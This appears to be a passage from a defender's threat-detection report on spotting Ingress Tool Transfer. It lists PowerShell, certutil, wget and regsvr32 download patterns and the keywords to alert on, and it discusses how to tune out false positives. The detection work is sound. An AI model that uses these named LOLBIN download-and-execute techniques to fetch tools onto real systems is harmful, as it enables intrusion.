Data sources that show process execution and command-line arguments (EDR tools, Sysmon, Windows Event Logs) are likely your best source of observing and detecting malicious use of Ingress Tool Transfer. These tools will allow you to look for a download or transfer taking place, as well as provide leads for further investigation. Using command-line arguments, you can examine remote systems and content used to facilitate the transfer. For example, PowerShell and
curl command lines often include URLs used to host remote content for download and execution. This data point provides an interesting pivot at which to proceed during investigations.
EDR tools and other data sources that show process telemetry can also be useful in identifying malicious use. As a rule, more data is usually better than less. In ideal scenarios, we recommend process monitoring tools that provide process name, command-line arguments, file modifications, DLL module loads, and network connections. The sum of this telemetry helps paint a picture of what capabilities exist inside unknown processes or scripts.
Telemetry showing network connections is often essential during investigations. While network connections on their own aren’t suspicious, combining network connection data with the known and expected behaviors of processes can yield breathtaking results. In addition, correlating network connections with other data points—such as file modifications or time of day—can help suspicious activity stand out from the crowd. A good example of this correlation would be
certutil.exe making network connections. On its own, the utility doesn’t typically make connections, but it may make file modifications. If a network connection occurs from
certutil.exe alongside the file modifications, you can more reasonably assess that
certutil.exe enabled Ingress Tool Transfer.
Finally, web filters, firewalls, and Intrusion Prevention Systems (IPS) that are capable of performing deep content inspection can be useful for identifying executables and DLLs being transferred into the network. Despite adversaries’ attempts at obfuscation, well constructed security architecture can enable defenders to spot useful patterns in traffic ingressing to the network from adversary-controlled systems. Good examples of these patterns include
MZ headers in executable content and portions of script content. This sort of data enables defenders to also use additional types of analytics or rules, such as those for Snort or Suricata detections. By supplementing endpoint detection capabilities with network data, your security team can become a relentless defensive force.
By far the most fruitful method by which we have identified malicious Ingress Tool Transfer use is examining PowerShell command lines for keywords and certain patterns. Look for the execution of
powershell.exe with command lines containing the following keywords:
downloadfile to a temporary/non standard location (
appdata) or in combination with execution (
You should also consider alerting on certain patterns in PowerShell command lines, like
download in the command line or
urlcache or with
split in the command line.
Another suspicious command pattern that warrants monitoring is
wget making an external network connection immediately followed by writing or modifying an executable file, particularly to a temp location.
Other LOLBINs such as
regsvr32.exe making external network connections to URLs ending with an executable or image extension, suspicious domains, and/or unusual IP addresses are inherently suspicious and warrant monitoring.
Weeding out false positives
The majority of the telemetry patterns above can also manifest in development pipelines and systems management tools. Given this, and as is the case for many detection ideas in this report, you may want to do an environment audit and figure out if these potentially suspicious behaviors are being employed by any legitimate tools or people in your environment.
Once you understand legitimate use cases, you can tune those out as exceptions and focus your detection efforts on seeking out behaviors that are more likely to represent malicious instances of Ingress Tool Transfer.